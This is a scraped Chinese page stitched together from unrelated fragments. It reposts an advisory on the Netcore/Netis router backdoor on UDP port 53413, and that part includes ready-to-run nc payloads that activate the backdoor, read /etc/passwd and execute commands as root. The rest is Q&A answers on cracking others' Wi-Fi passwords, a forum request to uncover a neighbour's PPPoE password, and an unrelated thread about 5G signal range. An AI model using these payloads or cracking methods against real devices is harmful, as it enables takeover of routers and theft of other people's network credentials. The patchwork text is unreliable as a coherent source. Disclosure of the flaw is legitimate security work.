如何获取磊科p2路由器路由p2的root权限

来源:蜘蛛抓取(WebSpider) 时间:2017-08-04 07:12 标签: 磊科360无线路由器p2
更好更安全的互联网
本文 PDF 下载:
2014 年 8 月末,由中国生产的一系列路由器(国内品牌名称为 Netcore ,国外品牌名称为 Netis )被爆出含有一个严重的后门漏洞。攻击者可以通过此漏洞获取路由器 root 权限。
2014 年 12 月 28 日,微博上爆料 Netcore 的后门仍然存在(文章地址:/p/)。
1.更新情况
2.漏洞概要
2014 年 8 月末,由中国生产的一系列路由器(国内品牌名称为 Netcore ,国外品牌名称为 Netis )被爆出含有一个严重的后门漏洞。攻击者可以通过此漏洞获取路由器 root 权限。
2014 年 12 月 28 日,微博上爆料 Netcore 的后门仍然存在(文章地址:)。
Netcore 系列路由器在 /bin 目录下存在一个名为 igdmptd 的程序,此程序会监听 UDP 端口 53413 端口:
之后调用 operate_loop 进入事件循环,来接受连接并处理。通过连接 53413 端口,可以通过特定格式的报文来获取路由器上的文件信息,上传文件,甚至是执行系统命令。
由于此端口暴露在公网,且此端口可以直接获得路由器的最高权限,所以危害极大。会造成 DNS 劫持、中间人攻击以及上网宽带的帐号密码泄漏等一系列影响。
在 Ubuntu 系统上配置 qemu-mipsel-static ,运行从固件提取出的后门程序 igdmptd ,发现已经监听在 udp 端口 53413 上,且监听 ip 地址为 0.0.0.0 。
利用如下 payload ,我们可以激活后门的登录状态:
python -c "print 'A'*8 + 'netcore\x00'" | nc -u -vv 10.211.55.10 53413
利用如下 payload ,读取系统文件:
python -c "print 'AA\x00\x01AAAA/etc/passwd\x00'" | nc -u -vv 10.211.55.10 53413
利用如下 payload ,执行系统命令:
python -c "print 'AA\x00\x00AAAA ls\x00'" | nc -u -vv 10.211.55.10 53413
3.修复建议
升级官方的最新版本固件,如果仍然存在,建议更换路由器。
4.相关资源链接
1.知道创宇官网:/
2.知道创宇旗下 - ZoomEye官网:http://www.zoomeye.org/
3.知道创宇旗下 - 加速乐云防御平台官网:/
作者:刘 开水 | Categories: | Tags: 、、不要root权限就能查看wifi密码的查看器
全部答案(共5个回答)
需要root。  破解WIFI密码:  1、首先需要准备的两款软件,可以在各大软件市场中下载到。例如【WIFI万能钥匙】跟【RE管理器】。  然后启动【WIFI万能钥匙】,打开右上角的开关。  在开启wifi开关后,会自动搜索并显示出当前有的wifi,启动数据连接,点击【WIFI万能钥匙】下面钥匙样式的按钮,这时候软件就会自动联网获取密码。  联网获取完毕后,【WIFI万能钥匙】就会在可从网上获密的WIFI右侧加上一把可解锁的钥匙。  这时候只要点击有可解锁钥匙的WIFI,然后使用万能钥匙自动解锁,稍等片刻WIFI就可以自动连上了。  查看WIFI密码:  1、破解完WIFI密码后,其实还不够完整。因为万能钥匙并没有提供可查看wifi密码的设置,所以此时要借助【wifi万能钥匙密码查看器】。  2、下载并启动【wifi万能钥匙密码查看器】。  3、授予软件root权限。  4、刚刚破解的wifi密码就可以看得到。
手机Wifi密码查看方法一:RE管理器查看手机Wifi密码  1、采用RE管理器查看手机Wifi密码,需要在手机ROOT之后,然后在手机中下载安装RE管理器  ...
可以获取root权限的。刷机、修改字体、自定义美化、修改开机 动画效果、以及设定等等都需要应用到root权限。我就举个例子吧。安卓的椒友一 定都清楚,刚买来手机...
WiFi密码器查看需要手机root权限的。1、下载并启动【wifi万能钥匙密码查看器】2、授予软件root权限。3、这时候刚刚破解的wifi密码就会展示出来。
查看红米上已连接的加密的wifi密码的方法:  1、先连接一个WiFi。  2、从红米桌面找到设置,然后打开。  3、点击WiFi右边的括号,然后下面有一个是”...
步骤一:先让手机(WIFI万能钥匙)连上你所要蹭的网步骤二:在将手机数据线连上电脑(不需要启动USB接口,也就是只让电脑给手机充电)步骤三:在安卓手机里的找到 ...
答: 如何修改点评?請教各位朋友
答: 美国苹果公司的新款手机,全触屏的智能机,在中国卖的很贵。
答: 手机购买还是找正规卖家
天猫等网站
答: 可能被设置了禁言你IP接入吧
大家还关注
确定举报此问题
举报原因(必选):
广告或垃圾信息
激进时政或意识形态话题
不雅词句或人身攻击
侵犯他人隐私
其它违法和不良信息
报告,这不是个问题
报告原因(必选):
这不是个问题
这个问题分类似乎错了
这个不是我熟悉的地区【如何获取磊科路由器里的PPPoE密码】_路由器吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:162,893贴子:
【如何获取磊科路由器里的PPPoE密码】收藏
这是隔壁邻居的路由器,不是我的。 这路由器没有导出设置config.bin文件功能。 我用了很多看星星的软件,也看不到星号隐藏的密码。 各位大神有没有办法,让星号里面的密码显示出来。
登录百度帐号推荐应用请完成以下验证码
查看: 5629|回复: 9
磊科360 P2路由
5G wifi信号不乍得
stevebasso
本帖最后由 stevebasso 于
09:07 编辑
买了,优惠价134元&&,
有线部分确实比以前TP 的要快,
不过,5G wifi信号不乍得,我的手机也是新买的能接收5G wifi信号,
在磊科360 P2 附近2米接收5G wifi信号,&&OK ,
但去到我的厅,隔一道墙,相隔7、8米,就自动切换到2.4G wifi信号, 5G wifi信号不行了
5G一般不建议隔墙使用。2.4G也不建议隔两堵墙使用。
这是它们就这样的。
如果真的如你说话,那么你的路由是正常规范的.
太正常了。5G是不能穿墙啊。
你试试插个U盘离线下载正常不,这路由器总是识别不了U盘,此功能是废的。
奇迹虎_QIHOO
楼主肯定是第一次用5G,频率越高的电磁波穿透性和发射距离就会越低,基本一堵墙就会减一半以上的信号,更别提七八米的距离了。
stevebasso
太正常了。5G是不能穿墙啊。
你试试插个U盘离线下载正常不,这路由器总是识别不了U盘,此功能是废的。
U盘离线下载 没试过,这样做?
把U盘插路由,开电脑BT软件下载,文件下载到U盘?
这就是5G啊。。。。。。。
stevebasso
5G一般不建议隔墙使用。2.4G也不建议隔两堵墙使用
U盘离线下载 没试过,这样做?
把U盘插路由,开电脑BT软件下载,文件下载到U盘?
不是的,离线下载啊,是你可以从电脑端,或者手机端给路由器一个离线下载任务,360P2以迅雷离线下载的方式把文件下载到路由U盘上。期间不用开手机或电脑的。
现在的问题是,360P2很容易出现U盘绑定失败的提示,手机端进不去,在电脑端迅雷离线又因为找不到存储设备而不能下载,这功能完全没法用,因为用这个功能的人并不多,所以不知道是普遍现象还是极个别。
HongYe2016
5G一般不建议隔墙使用
Copyright & KaFan & All Rights Reserved.
Powered by Discuz! X3.3( 苏ICP备号 ) GMT+8,

我要回帖

更多关于 磊科360无线路由器p2 的文章

 

随机推荐